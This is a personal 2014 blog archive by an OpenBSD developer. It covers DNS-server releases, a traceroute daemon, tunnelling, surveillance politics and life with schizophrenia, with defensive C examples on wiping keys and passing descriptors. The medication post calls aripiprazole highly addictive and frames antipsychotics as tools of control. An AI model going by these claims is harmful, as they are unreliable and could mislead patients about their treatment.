I read somewhere that firechat is being used to organize protesters in HK. So I tried it out and it drained my batteries overnight on my ipod. I quickly deleted it again, good thing today is a holiday in germany, as the ipod didn't wake me.



Ordered two books

October 3rd, 2014

I have ordered two books for the end of year.



Money lookout

October 4th, 2014

I'm simply spending way too much money. I only made ~ 10% savings this year of my income while at the same time the euro was so strong vs. the CAD that I lost 1000 euros income this year. So the books I bought this year will have to last until january. And in 2015 I plan on spending only 6-8 books. Also donation money will be less I'm cutting it by 1/3. I really have to tighten the belt if I want to achieve a certain amount of savings in mid-2016. I don't know if it's doable. But we'll see.



Citizen4

October 11th, 2014

There is a movie out by Laura Poitras called "citizenfour"; it's the story of Edward Snowden. In this article (in German) they write that the NSA has infiltrated German, Chinese, and South Korean networks with undercover agents as sysadmins in order to get at the infrastructure of those countries. I personally would just like to say to companies in Germany that not every foreign sysadmin is a spy and there are only a few bad apples. And I'd like to say to sysadmins that want to work in Germany, that perhaps you'll be watched on whatever you do and any actions you may do may reflect on your work at specific networks. As a hint if you encounter servers named "Kriminalpolizei" or "Bundespolizei", consider that these are just honey pots. Stay away from them as they won't let you log in anyhow. Aside from this caution you have to use your instincts why a server named "FBI" may be set up in a place where it does not make sense. Remember, authorities like to set up at hub points, not at edge networks. If they set up at the edge I'd say there is a good chance that it's fake.



Wildcarddnsd 0.9.0 to be released next month

October 13th, 2014

It will be likely tagged in the tree and tarballs made available for download on the 15th of November which is in 1 month and 2 days or so. There is a larger list of what has changed in the CHANGES file. I'm so happy I can hardly wait!



Turning off SSLv3 on Firefox on OpenBSD

October 15th, 2014

If you ever wanted to do this, here's how:
Type about:config in firefox's browser and promise to be careful, find the security.tls.version.min and set it to 1 instead of 0. That disables SSLv3.



Wiping Keys / Secrets (so important)

October 18th, 2014

I examined some software the other day that encrypts passwords. This particular software doesn't wipe its master key after use on the stack, so I was able to write a proof-of-concept on my raspberry pi, that reads the key from the stack when the database is accessed. Not knowing which is the key though one must run through all offsets in the dumpfile in order to crack the database, but that shouldn't be expensive in processor time.

The authors of Cryptography Engineering write about this too in section 21.10: keys should be wiped "as soon as a secret is no longer needed".

Some security-conscious programs even store sensitive keys in a privsep'ed process and wipe as much as possible.

So lessons learned are:

  1. don't share your UNIX account with anyone else
  2. wipe keys when finished with them
  3. privsep keys when possible

Who would I like to thank? Everyone that helped me get to this conclusion.
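Lesson 2 in code, as an added C example (not the software examined above; every name here is hypothetical): a key context whose secret is wiped on close and on every failure path, so a dead stack frame holds zeros instead of the master key. The derivation and tag functions are toys standing in for real cryptography.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define KEY_LEN 32

struct key_ctx {
    unsigned char master[KEY_LEN];      /* the secret */
    int loaded;
};

/* Zero memory through a volatile pointer. In practice this keeps the
 * optimizer from discarding the stores, which it may do with a plain
 * memset() on a buffer that is about to go out of scope. On OpenBSD the
 * native call for this job is explicit_bzero(3). */
void secure_wipe(void *p, size_t len)
{
    volatile unsigned char *vp = p;

    while (len--)
        *vp++ = 0;
}

/* 1 if every byte is zero; used here to check the wipe. */
int is_zero(const void *p, size_t len)
{
    const unsigned char *b = p;
    unsigned char acc = 0;

    while (len--)
        acc |= *b++;
    return acc == 0;
}

/* Toy derivation for the demo only (FNV-1a mixing, NOT a real KDF). */
int key_ctx_open(struct key_ctx *ctx, const char *pass)
{
    uint32_t h = 2166136261u;
    const char *p;
    size_t i;

    secure_wipe(ctx, sizeof(*ctx));
    if (pass == NULL || *pass == '\0')
        return -1;                      /* ctx stays wiped on failure */
    for (i = 0; i < KEY_LEN; i++) {
        for (p = pass; *p; p++)
            h = (h ^ (unsigned char)*p) * 16777619u;
        ctx->master[i] = (unsigned char)(h >> 24);
    }
    ctx->loaded = 1;
    return 0;
}

/* Toy keyed checksum standing in for "use the key". */
uint32_t key_ctx_tag(const struct key_ctx *ctx, const char *msg)
{
    uint32_t t = 2166136261u;
    size_t i;

    for (i = 0; msg[i]; i++)
        t = (t ^ (unsigned char)msg[i] ^ ctx->master[i % KEY_LEN]) * 16777619u;
    return t;
}

void key_ctx_close(struct key_ctx *ctx)
{
    secure_wipe(ctx, sizeof(*ctx));
}

/* The key lives in this stack frame only while it is needed and is wiped
 * on every path out of the function. */
int tag_once(const char *pass, const char *msg, uint32_t *out)
{
    struct key_ctx ctx;

    if (key_ctx_open(&ctx, pass) == -1)
        return -1;
    *out = key_ctx_tag(&ctx, msg);
    key_ctx_close(&ctx);
    return 0;
}

int main(void)
{
    uint32_t tag = 0;

    if (tag_once("constructed passphrase", "record", &tag) == 0)
        printf("tag %08x, key wiped before return\n", (unsigned)tag);
    return 0;
}
```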



I have a new VPS!

October 19th, 2014

I'm very excited to give you the news. This one is called supercluster.virgostar.net and I got it from transip.eu. The VPS was almost immediately available but I had to install the OS on a HTML5 console (wicked!). It costs me about 10 euros a month.



Mytd, my tcp traceroute daemon

October 22nd, 2014

Yesterday I programmed this daemon based on last month's tcp traceroute server. It's actually pretty cool, it sandboxes a lot of processes and uses descriptor passing when a function needs root credentials, the socket in question is always passed back to the non-privileged process. Here is a traceroute in process; this is how it looks:

$ ps auxwww|grep mytd 
root     13350  0.0  0.1   412   644 ??  Ss     9:52AM    0:00.00 mytd: master (mytd)
nobody   18672  0.0  0.1   476   808 ??  S      9:52AM    0:00.00 mytd: icmp listener (mytd)
root     29102  0.0  0.1   444   680 ??  S     10:59AM    0:00.00 mytd: ttl setter (mytd)
nobody   14652  0.0  0.1   624   924 ??  S     10:59AM    0:00.00 mytd: connection from 188.174.195.165 (mytd)

It's a looking glass traceroute, the traceroute looks a little like this:

mercury$ telnet supercluster.virgostar.net 1111
Trying 2a01:7c8:aaac:365::1...
telnet: connect to address 2a01:7c8:aaac:365::1: No route to host
Trying 149.210.171.149...
Connected to supercluster.virgostar.net.
Escape character is '^]'.
now sending you the traceroute, please wait...
now sending you the traceroute, please wait...
1 149.210.171.1
2 87.253.141.241
3 80.249.208.212
4 82.197.128.21
5 217.71.96.118
6 217.71.96.6
7 217.71.97.150
8 188.174.195.165
9 188.174.195.165
10 188.174.195.165
done.
Connection closed by foreign host.

I'm making the source code of this available here. Enjoy.
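The descriptor passing described above, as an added C example (not mytd's own source; all names are hypothetical): a worker lends its socket to a helper process over a UNIX-domain socketpair with SCM_RIGHTS, the helper sets the TTL and passes the socket back. In this demo both processes run as the same user; in a privsep daemon only the helper would keep root.

```c
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <string.h>
#include <unistd.h>

/* One-byte message plus control space for exactly one descriptor. */
struct fdmsg {
    struct msghdr msg;
    struct iovec iov;
    char byte;
    union {
        struct cmsghdr hdr;             /* forces cmsghdr alignment */
        char buf[CMSG_SPACE(sizeof(int))];
    } cb;
};

static void fdmsg_init(struct fdmsg *m)
{
    memset(m, 0, sizeof(*m));
    m->iov.iov_base = &m->byte;
    m->iov.iov_len = 1;
    m->msg.msg_iov = &m->iov;
    m->msg.msg_iovlen = 1;
    m->msg.msg_control = m->cb.buf;
    m->msg.msg_controllen = sizeof(m->cb.buf);
}

/* Send descriptor fd over the UNIX-domain socket chan (SCM_RIGHTS). */
int send_fd(int chan, int fd)
{
    struct fdmsg m;
    struct cmsghdr *cm;

    fdmsg_init(&m);
    cm = CMSG_FIRSTHDR(&m.msg);
    cm->cmsg_level = SOL_SOCKET;
    cm->cmsg_type = SCM_RIGHTS;
    cm->cmsg_len = CMSG_LEN(sizeof(int));
    memcpy(CMSG_DATA(cm), &fd, sizeof(int));
    return sendmsg(chan, &m.msg, 0) == 1 ? 0 : -1;
}

/* Receive one descriptor; -1 on EOF, error, or anything unexpected. */
int recv_fd(int chan)
{
    struct fdmsg m;
    struct cmsghdr *cm;
    int fd;

    fdmsg_init(&m);
    if (recvmsg(chan, &m.msg, 0) != 1 || (m.msg.msg_flags & MSG_CTRUNC))
        return -1;
    cm = CMSG_FIRSTHDR(&m.msg);
    if (cm == NULL || cm->cmsg_level != SOL_SOCKET ||
        cm->cmsg_type != SCM_RIGHTS || cm->cmsg_len != CMSG_LEN(sizeof(int)))
        return -1;
    memcpy(&fd, CMSG_DATA(cm), sizeof(int));
    return fd;
}

/* Worker lends a socket to a helper process (the "ttl setter" role), gets
 * it back, and returns the TTL now set on its own descriptor, or -1. */
int set_ttl_via_helper(int ttl)
{
    int sv[2], s, back = -1, got = -1;
    socklen_t len = sizeof(got);
    pid_t pid;

    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) == -1)
        return -1;
    if ((pid = fork()) == 0) {          /* helper process */
        close(sv[0]);
        s = recv_fd(sv[1]);
        if (s != -1 && setsockopt(s, IPPROTO_IP, IP_TTL, &ttl, sizeof(ttl)) == 0)
            send_fd(sv[1], s);
        _exit(0);
    }
    close(sv[1]);
    s = socket(AF_INET, SOCK_STREAM, 0);
    if (pid == -1 || s == -1 || send_fd(sv[0], s) == -1 ||
        (back = recv_fd(sv[0])) == -1 ||
        getsockopt(s, IPPROTO_IP, IP_TTL, &got, &len) == -1)
        got = -1;
    close(sv[0]);
    if (s != -1)
        close(s);
    if (back != -1)
        close(back);
    if (pid > 0)
        waitpid(pid, NULL, 0);
    return got;
}

int main(void)
{
    return set_ttl_via_helper(3) == 3 ? 0 : 1;
}
```

The worker reads the TTL from its original descriptor, not the one passed back: both refer to the same socket, which is why the helper's setsockopt() is visible to the unprivileged side.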



On my Christmas wish list: Book of PF

October 25th, 2014

The third edition of the Book of PF is out. I'm putting this on my Christmas wishlist, if not then, then I'll buy it next year as my book budget for this year is exhausted.



When TCP is blocked/manipulated...

October 26th, 2014

then we tunnel! In the following article I showed proof that the DTAG network is screwed up. The problem persists, and I have done a new thing to circumvent this screwing up. I have started to tunnel.

$ ifconfig gif0
gif0: flags=8051 mtu 1280
        priority: 0
        groups: gif
        tunnel: inet 149.210.171.149 -> 84.170.171.225
        inet6 fe80::ca5:8ff4:dd1c:99fb%gif0 ->  prefixlen 64 scopeid 0x6
        inet 10.0.0.2 --> 10.0.0.1 netmask 0xff000000

Right now everything works as it should and I have none of the retransmission and delays I was talking about earlier. This is further proof that DTAG is using some sort of Deep Packet Inspection that causes these screwups.

# ping 10.0.0.2 
PING 10.0.0.2 (10.0.0.2): 56 data bytes
64 bytes from 10.0.0.2: icmp_seq=0 ttl=255 time=58.851 ms
64 bytes from 10.0.0.2: icmp_seq=1 ttl=255 time=62.127 ms
64 bytes from 10.0.0.2: icmp_seq=2 ttl=255 time=64.028 ms
--- 10.0.0.2 ping statistics ---
3 packets transmitted, 3 packets received, 0.0% packet loss
round-trip min/avg/max/std-dev = 58.851/61.668/64.028/2.157 ms

Nuff said.



Proud owner of 5.6 CD's

October 29th, 2014

I have made prepwork to make mercury 5.6 tomorrow and I'll do the rest of the network here on saturday I guess. Yes OpenBSD!



Upgraded Uranus(computer) to OpenBSD 5.6

October 30th, 2014

With patches (errata) applied, it looks like this:

# sysctl kern.version
kern.version=OpenBSD 5.6 (URANUS.MP) #0: Thu Oct 30 09:57:34 CET 2014
    pjp@uranus.centroid.eu:/usr/src/sys/arch/i386/compile/URANUS.MP

I'll do the rest on Saturday when packages are available.



Careful of a FritzBox downgrade!

November 2nd, 2014

I downgraded my Fritzbox from 6.20 to 6.04, and it turns out the saved config is not backwards compatible. So after a lot of trying and not finding the DSL access codes I had to take it back to 6.20 and restore the config. It's a good thing that was possible. I then utilized my UDPTUNNEL program this morning and it's working like a charm. I guess the FB analyses TCP and does bad things with it.



Graphing DNS queries

November 5th, 2014

DNS doesn't take much traffic when the TTL is high enough. (like mine). I have graphed a few weeks worth of wildcarddnsd data, spikes are probably when I wrote to a mailing list.

I was graphing most of yesterday and decided to do the above today as well. RRDTOOL++!



Wildcarddnsd 0.9.0 Beta Release next Week

November 8th, 2014

One more week. I did some finishing touches today and then next week the BETA_9 release will be done. Be sure to download your copy if you've been using Wildcarddnsd, then. Also this may be the last release with the Wildcarddnsd name, I've been thinking of renaming it to avoid confusions that happen to pop up once in a while. The wildcarddnsd home page is at wildcarddns.centroid.eu.



Wildcarddnsd 0.9.0 will be released tomorrow

November 13th, 2014

Here is a sneak preview of what it has for new features from its new legacy homepage.

  • A new YACC parser
  • SPF (RFC 4408) support
  • SSHFP (RFC 4255 + 6594) support
  • EDNS0 (RFC 6891) support
  • NAPTR (RFC 2915) support
  • Notify (RFC 1996) master-only support
  • filters and ratelimiting (up to 127 pps)
  • a wildcarddns.conf manpage
  • and more...

This is the last release under the name "wildcarddnsd"; the project has been renamed delphinus dnsd. Enjoy!



Reflections: Nine years of wildcarddnsd

November 13th, 2014

November is the birthmonth for wildcarddnsd. Back in 2005, I was job-less, angry, and living on welfare, when I started to code on wildcarddnsd. It was my escape from an uncertain future, a future that didn't have me hold a job again. Well that turned out to be false. I did get a job 5 years later and things started to go uphill again. But all throughout the time I was unemployed and employed I took pleasure in writing for wildcarddnsd. Thanks W for all that! And thanks to everyone who supported me. Now that wildcarddnsd has been renamed I'm gonna have to say D instead of Double-U. I'm glad you exist D, and I hope to see you flourish into a full-fledged general purpose nameserver. Time will tell!



Delphinusdnsd is born

November 14th, 2014

The new tree was imported at the delphinus CVS repo. Delphinus DNS is the replacement name for Wildcarddnsd and from this day forward it will carry on development. I plan on putting in DNSSEC this release cycle, and delphinusdnsd will be released with version RELEASE_1_0 tag right away (as 1.0.0) next year around November 15th. Some commits were already made to this new tree, to wipe the old name away.



Reading Glenn Greenwald's book

November 16th, 2014

Remember Snowden? The journalist who had first contact with Snowden has written a book. I bought it, it's in german, not sure if you can get this book in english or not. The first 64 pages have been interesting but most of the story I already knew. Interesting was that Laura Poitras who recently released her film "citizenfour" was there since the start as well.

I asked the bookstore owner where I bought the book if Snowden is getting any proceeds from this book, and he was doubtful. Oh well, that's all I wanted to show.



My thoughts on the recent BND 300 million euro project

November 16th, 2014

The BND wants to crack facebook/TLS encryption. My view is as it has always been, like here. Waste of money, and totally not worth it. Imagine the electricity costs, that it takes to power 300 million euros worth of ASICS. It would be counter-productive of the will of the people here to change our energy transition to renewables.

I'm still peeved that the BND sold us out and gave the NSA our data. See here. I was living in Frankfurt in 2005 and it turned out that the BND forwarded data to the NSA from my provider at the time (freenet.de/pppool.de), sheesh!

Now that I'm reading Glenn Greenwald's book you may see more of this type of blog post. Although I'm not trying to fixate on this too much. I've got projects to do anyhow.



Living with Schizophrenia: the medication

November 19th, 2014

This is sorta a second part. As some of you know, I have schizophrenia. I don't feel different though, I feel like I've always felt. I don't hear voices or anything like that at all, but that's because schizophrenia entails a broad spectrum of traits ranging from paranoid to a schizoaffective and even depression. What I can tell you about me is that the doctors in Germany judged me mostly on my speech, which isn't fair because I lived in Canada for 15 years, and I have trouble recalling the right words. Most of the time I'd just like to say everything in English, but then no one would understand me. Sucks I know.

In Canada I was diagnosed with OCD so I started taking Luvox which is Fluvoxamine first. Having gone off it in cold turkey may have led to my greater psychosis. My gateway drug with schizophrenia was Zeldox aka Ziprasidone. It put on quite the pounds on me between 2003 and 2005, even though I was fairly physically active especially since losing my job due to "not performing as wished" in 2005. I got a little paranoid back then and displayed psychosomatic symptoms at work. I also went off this medication as I just couldn't handle my new psychiatrist. When I moved in 2006 or 2007 I went straight into the mental health facility and they prescribed me another medication that gave me a greedy appetite, called zyprexa aka Olanzapine. Then I really put on the fat with this stuff.

My psychiatrist (the original one) then reviewed me and gave me Abilify aka Aripiprazole. The current dosage is 30 mg a day now that I intake. I was watching youtube yesterday and saw someone whine that they had taken 7.5 mg and felt bad/symptoms. Poor them. I don't feel any side effects at even greater dosage.

While I'm positive that these medications can't harm me, I'm looking forward to the day when my doctor says that I don't need them anymore. I do feel that medications that are highly addictive like aripiprazole are a binding medication causing someone to cease being all over the place and settling down to one home, where taking medication binds you to the place you call home. It's more to do with control than healing. That's all I wanted to talk about today.



Love coming to an end

November 20th, 2014

In 5 days my 3 months trial of Zoosk.com is running out. Unfortunately even as a paying member I was not able to conduct any chat with other members. And I didn't find anyone beyond animalistic attraction. So my love search is coming to an end. I've joked to friends that I'm possibly going to register a new .love domain in order to have google find me a partner. But who am I kidding...she's not out there!



Fixed longstanding bug in Delphinusdnsd

November 21st, 2014

Up to today and in the 0.9.0 release Delphinusdnsd had a bug with time to lives. A domain name with different RRsets would give the lowest RRset's TTL to all of them. So if you had an A with ttl 1800, an MX with ttl 2400 and an NS record with a ttl of 3600 and the A record happened to be the last parsed in the configfile, all RR's would have a TTL of 1800. This is fixed now as I needed that fixed for RRSIG records.



Left Zoosk forever, love DS.

November 24th, 2014

Well I left Zoosk. I closed my account. To me it was a waste of time, not sure who else thinks so. I never got to chat to anyone and never made a date. However Zoosk gave me some insights which I've printed out. I'm going to share my results with you.

  1. Women who were interested in me had the average age of 36
  2. I attracted women who are non-smokers
  3. I attracted women who don't have kids more often.
  4. Women who watch action are often attracted to me
  5. I attract women who live within 136 km from me
  6. Most women attracted to me were Sagittarius and Libra
  7. Demographics of women who have shown interest in me
    • Ethnicity: White 78.3%, Mixed/Other 13%, Latino/Hispanic 4.3%, Asian 4.3%
    • Education: Attended College 73.9%, High school graduate 17.4%, No degree 4.3%, College graduate 4.3%
    • Body Type: Average 52.2%, Slim 30.4%, Curvy 8.7%, Athletic 8.7%
    • Children: No 47.8%, Yes - at home 43.5%, Yes - they don't live with me 8.7%
    • Religion: Atheist 22.7%, Christian 22.7%, Catholic 22.7%, Other 18.2%, Muslim 13.6%
    • Smoking: No 56.5%, Yes - regularly 34.8%, Yes - socially 8.7%
  8. Interests of women who expressed interest in me
    • Music - Dance and Electronic was winner.
    • Movies - Action and Drama seemed to be tied for 1st
    • Sports - Boxing and Martial Arts
    • Books - Romance and Religion/Spirituality
    • TV - Drama
    • Games - Arcade

That was statistics for women interested in me. Now I'm not going to go into what I liked the most except I'll give you a clue what women I was most interested in were: Depeche Mode, Clueso, Two and a Half Men. I don't think that's true at all, but perhaps it is!

When it comes out I'm probably going to register a .love domain and continue my search for a partner that way, perhaps with help of google? I already pre-ordered the domain I just have to be willing to accept it when it's available and that depends how pricy it will be.



Got out the winter jacket

November 26th, 2014

I also turned up the heat to level 3 (highest) and increased the night charger to 5 hours. I expect tomorrow it'll be nice and cozy warm. Today I'm frosting a little (my feet are cold).



Google should be broken up? No.

November 27th, 2014

I didn't know I'd say this, but, Google should not be broken up like European politicians want it. First look at how Google got started. In California, USA. Land of possibilities and capitalism. Europe on the other hand has less possibilities but is still capitalist. So why is there no European Google? The answer is simply because the economic and juristic landscape in Europe doesn't allow a Google. I've tested this first hand. Network policies of European providers cry out when there is an attempt to make it as a search engine. So I am against the European Union's vote to break up Google. If you don't like Google, give us freedoms and we'll make our own! Don't bite the other's hand because they had the freedom to do what you can't! I'm sure other people in Europe see this differently, but some may agree with me.



Upgraded io.solarscale.de

December 2nd, 2014

Happy December!
I have upgraded io.solarscale.de, my VPS in Bavaria. It is now running FreeBSD 10.1-RELEASE-p0. You may have noticed emea.centroid.eu being down for about 7 hours, if you did I hope you used the americas.centroid.eu mirror. io.solarscale.de does mail, dns and web and some other services.



Purchased iTunes music

December 4th, 2014

Something to get me through the upcoming winter. I have purchased "Real Life Stories" by Lutan Fyah and Turbulence featuring Jessie Reds. This album/EP came out in 2014 so it's new music for me.



2014 in review, what happened this year?

December 6th, 2014

Usually I do this review on the 10th of December every year but this year I may not have time on the 10th so I set out to do it on the weekend before. Here goes:

December 2nd, 2014 - Upgraded io.solarscale.de
November 27, 2014 - Google should be broken up? No.
November 26, 2014 - Got out the winter jacket
November 24, 2014 - Left Zoosk forever, Love DS
November 21, 2014 - Fixed a long standing bug with Delphinusdnsd
November 20, 2014 - Love coming to an end
November 19, 2014 - Living with Schizophrenia: the medication
November 16, 2014 - Reading Glenn Greenwalds book
November 14, 2014 - Delphinusdnsd is born
November 13, 2014 - Reflections: Nine years of wildcarddnsd
November 13, 2014 - Wildcarddnsd 0.9.0 will be released tomorrow
November 5th, 2014 - Graphing DNS queries
November 2nd, 2014 - Careful of a FritzBox downgrade
October 29, 2014 - Proud owner of 5.6 CD's
October 26, 2014 - When TCP is blocked/manipulated
October 25, 2014 - On my Christmas wish list: book of Pf
October 22, 2014 - Mytd, my tcp traceroute daemon
October 19, 2014 - I have a new VPS!
October 18, 2014 - Wiping keys, so important
October 15, 2014 - Turning off SSLv3 on OpenBSD's Firefox
October 13, 2014 - Wildcarddnsd 0.9.0 to be released next month
October 11, 2014 - Citizen4
October 4th, 2014 - money lookout
October 3rd, 2014 - Tried the firechat app
September 30, 2014 - Two tcp traceroutes
September 24, 2014 - Donated 5 dollars to the FreeBSD Foundation
September 22, 2014 - OpenBSD blocked at the routers?
September 20, 2014 - Equinox in three days
September 12, 2014 - The Enforcers of the Internet?
September 10, 2014 - moon finally gone
September 7th, 2014 - Venus (computer) has 4 more interfaces
September 2nd, 2014 - Donation time again
September 1st, 2014 - Purchased Soekris addon
August 29, 2014 - War in Europe
August 29, 2014 - holiday coming to an end
August 22, 2014 - Fears of a centralized wifi
August 21, 2014 - Futile attempt on a dating service
August 20, 2014 - The end of moon.
August 19, 2014 - On holidays what will I do?
August 18, 2014 - Changed dns servers
August 15, 2014 - Why I use Amazon
August 13, 2014 - New open source: bindsync
August 12, 2014 - removed moon.virgostar.net from nameservers
August 12, 2014 - Asylum for Snowden
August 11, 2014 - OpenBSD has a new httpd
August 11, 2014 - nginx and fastcgi stopped working
August 4th, 2014 - My next .ca vacation
August 2nd, 2014 - Tunnels vs. Submarines
August 1st, 2014 - 40 days til end of moon
July 27, 2014 - My Prayer
July 25, 2014 - Interrupted Venus's uptime
July 23, 2014 - Backdoored Hardware
July 19, 2014 - The dark side of IT workers
July 19, 2014 - How much space would we have if .. 
July 8th, 2014 - An old rap song of mine
July 6th, 2014 - How to compile xephem from source on OpenBSD
July 4th, 2014 - Why a static IP is best
June 30, 2014 - Happy Canada day (tomorrow)
June 28, 2014 - A message to the justice minister: you're doing it wrong
June 23, 2014 - Cherries 2014
June 21, 2014 - Happy solstice
June 13, 2014 - ap.centroid.eu
June 11, 2014 - Isn't it time for a new computer design?
June 5th, 2014 - My 2nd WRT router
May 31, 2014 - Opinion: the destroyers of the 'net
May 29, 2014 - Another TODO for wildcarddnsd
May 28, 2014 - Snowden: All german citizens are spied on
May 25, 2014 - I went voting in the EU election
May 23, 2014 - The Tree
May 23, 2014 - The heaven is singing a lullaby
May 21, 2014 - On my XMAS wishlist
May 17, 2014 - Wildcarddnsd now has RFC 1996 (Notify) master-only support 
May 14, 2014 - The NSA, one year after Snowden
May 13, 2014 - Happy 1400000000
May 11, 2014 - Wildcarddnsd now has NAPTR support
May 10, 2014 - Wildcarddnsd now has EDNS0 support
May 7th, 2014 - Administrivia and future plans network wise
May 5th, 2014 - wildcarddnsd now has packet rate limiting
May 4th, 2014 - got openbsd in the mail yesterday
April 28, 2014 - Two racing ARP's
April 25, 2014 - Highest possible date on OpenBSD 5.5
April 23, 2014 - Mercury (computer) OpenBSD dmesg
April 22, 2014 - Mercury (computer) has arrived
April 18, 2014 - All my domains now have spf records
April 13, 2014 - Wildcarddnsd has a YACC parser now!
April 11, 2014 - My new computer is ordered
April 8th, 2014 - Heartbleed, my story
April 4th, 2014 - Where would you hide?
April 2nd, 2014 - Good weather ahead?
March 31, 2014 - Happy 5th anniversary centroid.eu blog
March 31, 2014 - Pre-ordered OpenBSD 5.5
March 30, 2014 - My C Primer hits 30,000 views
March 27, 2014 - Oculus Rift, too bad
March 27, 2014 - Scaling back on donations this year
March 26, 2014 - americas.centroid.eu upgraded to FreeBSD 10 
March 21, 2014 - I hunt Sysadmins
March 20, 2014 - Spring has sprung!
March 19, 2014 - As the world turns
March 14, 2014 - The case with consumer routers
March 14, 2014 - Happy Pi day
March 8th, 2014 - Viewable Starsky tonight
March 4th, 2014 - What happened to *REAL* technical support?
March 2nd, 2014 - How should we punish aggressors?
February 25, 2014 - Win for the Consumer in Germany
February 20, 2014 - Upgraded my FritzBox Repeater 300E 
February 19, 2014 - My apartment: Year 1
February 18, 2014 - New Computer the decision factor
February 15, 2014 - OpenSMTPD on FreeBSD with Spam Assassin
February 14, 2014 - Happy Valentines day
February 13, 2014 - SVPRadio.com did get media attention in 2012
February 12, 2014 - Security can be about Incentives
February 12, 2014 - New naming scheme after planets
February 11, 2014 - After a long downtime my VPS americas is back
February 4th, 2014 - OS Changes back
January 28, 2014 - My apology to OpenBSD
January 24, 2014 - Someone actively probed my MTS tunnel (MITM)
January 20, 2014 - FreeBSD 10.0 released
January 19, 2014 - The Apple magic wore off
January 15, 2014 - Donation time again
January 15, 2014 - Is the NSA so much smarter than everyone else?
January 11, 2014 - What would I do in Virtual Reality?
January 10, 2014 - Freifunk Franken
January 8th, 2014 - So who owns the Internet
January 2nd, 2014 - My IT spendings are just about average in .de
January 1st, 2014 - Why China is fixated on the moon
December 30, 2013 - My Moonchart
December 26, 2013 - Success, configuring the resolver right
December 23, 2013 - Purchased Music off iTunes
December 23, 2013 - Living with Schizophrenia, what's it like?
December 22, 2013 - Donated 5 euros to the LibreOffice document foundation
December 19, 2013 - I'm in love with the new Apple Mac Pro (cylinder)
December 17, 2013 - Compartmenting more $USER functionality
December 16, 2013 - I wish Europe would land on the moon too

A lot has happened this year, it was great going over it again.



When Fighters scramble

December 6th, 2014

In the 21st century scrambling fighters against a 20th century bomber may seem like a good deed but let's think about what really could happen. The fighter has a crew of 1 or 2, the bomber has a crew of 6+, plus it has a lot of room for equipment not bombs. What's this you say? Equipment?

It's logical in the 21st century to conduct electronic surveillance not to test the defences of the west, in fact what I think may be happening is that as an example, Russian bombers are getting a lot more from NATO fighters than we think. If the NATO radio is on, it'll be encrypted. That's what they probably want. They probably test the electronics of the fighter too. So when the Bear goes home, it'll be filled with data on the encounter. Valuable data. Which the military complex there can pounce on and devour.

Just makes sense doesn't it?



Speak German at home...

December 8th, 2014

The BBC reports that the Bavarian government insists that migrant families speak German at home. I have a few opinions about that:

  • One, no one gives a hoot what you do in the privacy of your home. If they do they oughta really check themselves before they wreck themselves.
  • No one can understand south Bavarian dialects either.
  • And thirdly, if my parents, when we lived in Canada had chosen to allow us to continue speaking English, instead of German at home, then I would have completely lost the German language. I mean completely. Just a few years ago when I worked at the Bavarian Red Cross, one of the reasons they fired me was because of my poor German. Yet it wasn't even that bad. Had I not known any German then things would have been even more difficult. Language barriers only make a migrant's life a lot harder in the long run when they return to where they came from. Don't take that away from them is my opinion, German is not a world business language, meaning it accounts to absolutely zero in some far off country.

Until the Bavarian government realises this I wish on them to become a migrant for 5 years. Then we'll see how different they see the world.



Farewell American Forces

December 9th, 2014

When my family first moved to Schweinfurt there were two major things here: Industry and the US Army. It must have been 1979 when we came here and the cold war was in full swing. I remember a battalion of tanks riding past me at the Obertor (Upper gate) and it left me a bit crazy, as I, a boy at the time was a huge contrast to these huge machines manned with waving soldiers. Another time I remember being on a class trip and we walked past a tank but didn't spot it because it was camouflaged so well with camouflage netting. Another time a Jeep around 1985 sat in front of my house at 9:30PM with its radio turned up loud. It was a sort of maneuver they were doing where they practiced "Urban" warfare I guess. My dad spoiled it for them as he told them to leave because I was trying to sleep. So now it's 30 years later since these encounters, the cold war is long gone and peaceful times saturated this city. It's been a few months ago now since I guess the last American soldier left. The US has left behind 2 major barracks, Ledward and Conn. Since Conn had its own water infrastructure and its own sewage treatment they are trying now to connect it to the rest of the city. In the new year we expect refugees from around the world.. (asylum seekers) to fill the Conn barracks. At least it has a purpose still if they manage to connect it all. So long America, Schweinfurt may miss you at times. However you leave behind some children who have a US citizenship so I'm sure you'll hear from us once in a while as many of these children grow up and set foot on American soil and will have stories to tell.



Comparison between Mordor and the US

December 12th, 2014

| Traits | Mordor | US |
|---|---|---|
| Tortures | yes | yes |
| Has spies all over the planet | yes | yes |
| Collects spy data on everyone | no | yes |
| Has tough border and customs control | yes | yes |
| Has elite military units | yes | yes |
| Has several allies | yes | yes |
| Has death penalty | yes | yes |
| Puts emphasis on towers | yes | yes |

I could go on but the point is made, except for a sole ruler, which the US doesn't have.



December solstice in less than a week!

December 15th, 2014

On the 21st of December we have the December solstice. That's when short days will turn around and lengthen until June. Also on that day is the official start of winter (I know some people don't grasp that, they see snow they think it's winter). Winter will last until the equinox in March.



A domain expired, amdeutschhof.de

December 16th, 2014

When I knew I'd be getting this apartment I registered this domain called amdeutschhof.de. It's hard to believe it's 2 years later. Here is an image found on the site that I set up for it:

The domain didn't get many hits and it wasn't popular I don't think. However the sign was taken down after it was vandalized some time ago. I got a good picture of how it once looked. Yes, somewhere on that map is where I live.



My thought about Pegida

December 16th, 2014

I think the people around Pegida are wrong. However, one had a valid demand. He said to get rid of the GEZ which is a tax that everyone has to pay on top of taxes, to finance the state run media (mainly ARD, ZDF, DW and such media). I too would like this tax gone. It's too likely that state run media is used for propaganda. Especially in these times.

Another person said that there is no money for public installations but money for asylum seekers (refugees). To that person I would say, "Look in your heart, do you really want someone to continue to live the misery that they do? When all you have to do is tolerate them as neighbours. It would make a big difference to all."

Another said "everywhere where there is war, Germany is involved, this has to stop". Sorry, you can't stick your head in the sand and ignore the grim picture of the world around us. We have to act against aggressors however twisted war is. We've had 70 years of peace after making a real mess of the world 70 years ago. Why should we not help those that need help? And let's be frank, 70 years of peace has created people who are "products of the environment" which is hazardous in some cases.

So I agree with one, disagree with two others. Pegida doesn't care for anyone but their own self-served interests. I liken them to the minutemen in the US.



NASA wants to go to Venus

December 17th, 2014

Remember the Venus Glider? One of my ideas? Search for it in this blog. Anyhow NASA wants to go to Venus with a manned mission and study the atmosphere at 50 km high. Life is bearable there we predict. Only they want to do it with a blimp instead of a glider.

